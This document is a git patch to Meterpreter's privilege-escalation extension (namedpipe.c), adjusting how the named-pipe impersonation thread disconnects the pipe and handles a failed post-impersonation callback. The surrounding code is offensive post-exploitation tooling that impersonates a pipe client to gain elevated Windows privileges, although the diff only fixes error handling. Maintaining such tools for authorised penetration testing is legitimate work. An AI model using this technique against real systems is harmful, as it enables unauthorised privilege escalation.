From 1aac00a6ce313ffb06e8cd6f2147de343eb32e8d Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Tue, 6 Oct 2020 15:18:01 -0400
Subject: [PATCH] Disconnect the named pipe and break after the impersonation
callback
---
c/meterpreter/source/extensions/priv/namedpipe.c | 9 ++++++---
1 file changed, 6 insertions(+), 3 deletions(-)
diff --git a/c/meterpreter/source/extensions/priv/namedpipe.c b/c/meterpreter/source/extensions/priv/namedpipe.c
index 3be6b250..e5d80f1b 100644
--- a/c/meterpreter/source/extensions/priv/namedpipe.c
+++ b/c/meterpreter/source/extensions/priv/namedpipe.c
@@ -35,6 +35,7 @@ DWORD THREADCALL elevate_namedpipe_thread(THREAD * thread)
char * cpPipeName = NULL;
BYTE bMessage[128] = {0};
DWORD dwBytes = 0;
+ BOOL bImpersonated = FALSE;
PPRIV_POST_IMPERSONATION pPostImpersonation = NULL;
do {
@@ -85,11 +86,14 @@ DWORD THREADCALL elevate_namedpipe_thread(THREAD * thread)
// we can't impersonate a client until we have performed a read on the pipe...
if (!ReadFile(hPipe, &bMessage, 1, &dwBytes, NULL)) {
+ DisconnectNamedPipe(hPipe);
CONTINUE_ON_ERROR("[ELEVATE] pipethread. ReadFile failed");
}
// impersonate the client!
- if (!ImpersonateNamedPipeClient(hPipe)) {
+ bImpersonated = ImpersonateNamedPipeClient(hPipe);
+ DisconnectNamedPipe(hPipe);
+ if (!bImpersonated) {
CONTINUE_ON_ERROR("[ELEVATE] elevate_namedpipe_thread. ImpersonateNamedPipeClient failed");
}
@@ -98,7 +102,7 @@ DWORD THREADCALL elevate_namedpipe_thread(THREAD * thread)
dwResult = pPostImpersonation->pCallback(pPostImpersonation->pCallbackParam);
if (dwResult != ERROR_SUCCESS) {
RevertToSelf();
- CONTINUE_ON_ERROR("[ELEVATE] elevate_namedpipe_thread. the post impersonation callback failed");
+ BREAK_ON_ERROR("[ELEVATE] elevate_namedpipe_thread. the post impersonation callback failed");
}
}
else {
@@ -109,7 +113,6 @@ DWORD THREADCALL elevate_namedpipe_thread(THREAD * thread)
} while (0);
if (hPipe) {
- DisconnectNamedPipe(hPipe);
CLOSE_HANDLE(hPipe);
}